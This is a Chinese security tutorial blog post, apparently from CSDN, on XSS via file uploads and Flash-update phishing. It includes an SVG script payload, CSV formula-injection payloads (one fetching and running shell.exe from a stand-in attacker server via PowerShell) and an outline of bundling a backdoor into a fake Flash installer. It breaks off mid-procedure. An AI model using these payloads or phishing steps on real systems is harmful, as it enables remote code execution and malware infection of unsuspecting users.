XSS之Flash弹窗钓鱼和文件上传getshell各种姿势,网络安全零基础入门到精通教程建议收藏!

1 前言

哈喽,大家好!

这次打算给师弟们分享的是XSS之Flash弹窗钓鱼和文件上传getshell各种姿势的内容,然后先是给小白师傅们简单介绍下XSS漏洞和文件上传漏洞。然后后面给师傅们简单演示了XSS之Flash弹窗钓鱼,然后后面很详细的介绍了文件上传和XSS漏洞的组合拳的好几种方式,后面也是通过对一个站点的测试,给师傅们演示了一波。后面给师傅们整理了下pdf木马制作的过程以及最后面分享下我一次在测文件上传最后也是getshell了。

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

2 漏洞简介

一、文件上传原理

这里利用form表单标签和类型为file的Input标签来完成上传,要将表单数据编码格式置为 multipart/form-data 类型,这个编码类型会对文件内容在上传时进行处理,以便服务端处理程序解析文件类型与内容,完成上传操作。

<form method="POST" enctype="multipart/form-data">          
  <input type="file" name="file" value="请选择文件"><br />          
  <input type="submit">          
form>       

二、XSS原理

XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通常会在网页中插入恶意的 JavaScript 代码。由于服务器对输入数据的过滤和验证不严格,这些恶意的 JavaScript 代码会被当作响应的一部分返回给客户端。当浏览器解析来自服务器的响应时,它会执行这些恶意的 JavaScript 代码,从而导致攻击者能够执行恶意操作。

在这里插入图片描述

3 浅谈上传XSS的各种类型姿势

允许上传HTML或SVG

允许上传html或者svg都可以能导致xss,也能导致任意URL跳转,甚至还能导致SSRF(很难利用),因为核心还是js代码可控;

html造成XSS就不多说了,懂得都懂;

主要说说svg文件如何造成xss。

检查思路:

1.创建一个恶意的svg文件,输入如下内容:

<svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="100" height="100">          
    <script type="application/javascript">          
        alert('XSS Attack!');          
    script>            
    <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>            
svg>

在这里插入图片描述

1.上传到文件中,并访问

可以看到已经成功弹窗出来了XSS漏洞

在这里插入图片描述

拓展:如果目标存在导出功能,如给svg导出为pdf这种功能,那么可能存在SSRF

可尝试使用其他协议更直观的查看,如file://

允许上传PDF文件

可能存在PDF XSS和任意URL跳转,但是由于属于浏览器层面的漏洞,所以厂商大概率不认可。

可以直接使用工具生成:https://www.xunjiepdf.com/editor

也可以按照网上的操作,用迅捷PDF编辑器去操作,效果都一样

因为pdf一般是后端的组件,有的开发可能配置成 wkhtmltopdf /tmp/html123.htm /uploads/pdf.pdf ,那就可直接利用file协议进行利用

如果网站本身存在预览JS的地方,可以试试通过CVE-2024-4367来实现PDF XSS 获取Cookie、账户接管等。

在这里插入图片描述

允许上传CSV文件

如果允许上传CSV文件,且上传的CSV文件的内容未经过处理过滤直接保存,那么可以尝试上传具有恶意命令执行payload的CSV文件,当其他用户下载该CSV文件时,可能会导致命令执行。

CSV文件的Payload如下:

DDE ("cmd";"/C calc";"!A0")A0          
@SUM(1+9)*cmd|' /C calc'!A0          
=10+20+cmd|' /C calc'!A0          
=cmd|' /C notepad'!'A1'          
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0          
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

检查思路:

1.上传恶意的CSV文件

2.下载恶意的CSV文件

3.观察下载后的CSV文件是否对等号=等特殊符号做了处理,payloads会否会成功执行,如果能则说明存在问题

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

4 XSS之Flash弹窗钓鱼

一、基础环境准备

●Flash网站克隆源码:GitHub - hackxc/xss_flash: Xss之Flash钓鱼**

在这里插入图片描述

●生成后门并捆绑flash的安装程序

●VPS服务器,搭建好flash网站,下载地址要修改为构造好的后门文件。

●有XSS漏洞的网站:GitHub - r00tSe7en/Flash-Pop: Flash钓鱼弹窗优化版

在这里插入图片描述

二、具体钓鱼流程

1.找到可以插入一段JS代码的网站,如:存在存储xss漏洞。插入触发flash版本过低弹窗的JS代码:

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值